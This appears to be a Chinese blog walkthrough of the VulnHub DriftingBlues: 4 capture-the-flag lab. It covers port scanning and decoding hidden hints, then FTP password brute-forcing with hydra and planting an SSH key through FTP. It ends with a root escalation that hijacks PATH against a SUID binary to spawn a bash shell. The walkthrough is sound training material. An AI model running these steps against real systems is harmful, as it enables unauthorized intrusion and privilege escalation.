DRIFTINGBLUES: 4实战演练

最新推荐文章于 2024-08-30 18:45:00 发布
最新推荐文章于 2024-08-30 18:45:00 发布
阅读量154 收藏
点赞数
分类专栏: vulnhub 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131340352
版权

文章目录

DRIFTINGBLUES: 4实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/driftingblues-4,661/

设备名称IP地址
攻击机:kali192.168.2.20
靶机:DRIFTINGBLUES: 4192.168.2.24
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.24

# 开放FTP:21端口、SSH:22端口、WEB:80端口
# FTP:21端口版本号为ProFTPD
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2
# WEB:80端口中间件为Apache httpd 2.4.38

在这里插入图片描述

2、访问网站
http://192.168.2.24/

在这里插入图片描述

3、查看源码
view-source:http://192.168.2.24/

# base64密文:Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09

在这里插入图片描述

4、解密
go back intruder!!! 
tight security drippin
i hope you're an employee
/imfuckingmad.txt

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5、访问网页
http://192.168.2.24/imfuckingmad.txt

在这里插入图片描述

6、解密

解密网站:https://www.splitbrain.org/services/ook

man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! 
/iTiS3Cr3TbiTCh.png

在这里插入图片描述

7、访问网页
http://192.168.2.24//iTiS3Cr3TbiTCh.png

在这里插入图片描述

8、微信扫一扫
https://i.imgur.com/a4JjS76.png

# 得到四个用户名:luther、gary、hubert、clark

在这里插入图片描述

9、爆破FTP
┌──(kali㉿kali)-[~]
└─$ hydra -l hubert -P /home/kali/rockyou.txt ftp://192.168.2.24

# 账号:hubert
# 密码:john316

在这里插入图片描述

10、登录FTP
┌──(kali㉿kali)-[~]
└─$ ftp hubert@192.168.2.24

在这里插入图片描述

11、下载文件并查看
ftp> get sync_log

┌──(kali㉿kali)-[~]
└─$ cat sync_log

sync:linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块。

在这里插入图片描述

12、写入SSH密钥并上传
ftp> cd hubert
ftp> mkdir .ssh     
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -f sain    

┌──(kali㉿kali)-[~]
└─$ cp sain.pub ./authorized_keys

ftp> put authorized_keys

在这里插入图片描述

13、SSH连接
┌──(kali㉿kali)-[~]
└─$ ssh hubert@192.168.2.24 -i sain

在这里插入图片描述

三、后渗透
1、查看第一个flag
hubert@driftingblues:~$ ls -alh
hubert@driftingblues:~$ cat user.txt

在这里插入图片描述

2、查找权限和SUID文件
hubert@driftingblues:~$ find / -user root -perm /4000 2>/dev/null

在这里插入图片描述

3、查看文件
hubert@driftingblues:~$ /usr/bin/getinfo

在这里插入图片描述

4、设置变量并运行
hubert@driftingblues:~$ cd /tmp/
hubert@driftingblues:/tmp$ echo '/bin/bash -i' > ip
hubert@driftingblues:/tmp$ chmod +x ip 
hubert@driftingblues:/tmp$ export PATH=/tmp/:$PATH
hubert@driftingblues:/tmp$ getinfo

在这里插入图片描述

5、查看第二个flag
root@driftingblues:/tmp# cd /root/
root@driftingblues:/root# ls -alh
root@driftingblues:/root# cat root.txt

在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FPGA设计实战演练(高级技巧篇)
11-16
一生中有幸成为新发现或新思想的一部分的机会屈指可数。某些思想或革新会极大地改变我们所生活的 世界。想一想如果生物科学家完成了整个人类基因的绘制 — 确定了DNA结构的最后一个基因,美国国 ...
Spring Boot实战演练Demo
09-06
《Spring Boot实战演练Demo》是基于Java开发框架Spring Boot的一次深入实践,旨在帮助开发者更好地理解和运用Spring Boot进行快速开发。这个Demo包含了丰富的代码示例和详细的解释,以辅助学习者通过实例掌握Spring ...
2014江西公务员面试备考:考前实战演练及解析五十九.doc
02-16
2014江西公务员面试备考:考前实战演练及解析五十九.doc
CSRF防护:CSRF防护实战演练.docx
08-27
CSRF防护:CSRF防护实战演练.docx
C#与.NET技术平台实战演练
12-02
C#与.NET技术平台实战演练
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8433
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 393
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
08-30 983
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
信息安全--(四)网络安全体系与安全模型(二)
m0_60936698的博客
08-30 627
■ 等级保护分为五个:第一级(用户自主保护级)、第二级(系统审计保护级)、第三级(安全标记保护级)、第四级(结构化保护级)、第五级(访问验证保护级)。■ ①扩大了对象方位,将云计算、移动互联、物联网、工业控制系统等列入标准范围,构成了“网络安全 通用要求+新型应用的网络安全扩展要求”的要求内容。■ 管理手段:包括安全评估、安全监管、应急响应、安全协调、安全标准和规范、保密检查、认证和访 问控制等;管理目标: (大)政治、经济、文化、国防安全等,(小)网络系统的保密、可用、可控等。·监督安全项目的实施;
网络安全】分析重置密码功能实现账户接管
等风来
08-26 193
点击了重新发送电子邮件的按钮后,我在攻击者的邮箱得到了受害者的重置密码链接,从而实现了账户接管。
网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 322
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
网络安全】分析cookie实现PII IDOR
等风来
08-27 88
目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-30 704
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-30 857
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 403
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
网络安全的历史
网络研究观
08-27 1188
直到多年以后,由于网络攻击和危险实体威胁的频繁发生,网络安全的发展才受到重视。
网络安全系统性学习路线「全文字详细介绍」
HUANGXIN9898的博客
08-27 1443
🤟 基于入门网络安全打造的:👉黑客&网络安全入门&进阶学习资源包 一、基础与准备 网络安全行业与法规 想要从事网络安全行业,必然要先对行业建立一个整体的认知,了解网络安全对于国家和社会的作用,避免出现“一叶障目,不见森林”的情况。 Linux 操作系统(网安) 很多初学者也常忽略Linux的重要性,认为学习的重头戏在框架等方面,但其实Linux也是重中之重。 计算机网络基础 计算机网络基础是网络/运维工程师都需掌握的知识,但往往会被忽略。但是它是非常重要的。 HTML(
网络安全之渗透测试实战-DC-3-靶机入侵
DoubleJing的博客
08-27 910
(2)但是目标主机处于内网环境是不可以被外网直接访问,只能主动将shell反弹出来.这种方式称作反弹shell,反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端与服务端的角色反转。Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。获取本网段的主机信息,根据MAC地址比对来获取DC-3的IP地址。
Linux入门到精通:实战演练与C语言示例
本资源是一份针对Linux系统学习的实战演练参考答案,旨在帮助读者从入门阶段逐步提升技能。在《Linux从入门到精通》这本书中,作者将理论知识与实践操作紧密结合,通过一系列实战案例让学习者深入理解和掌握Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值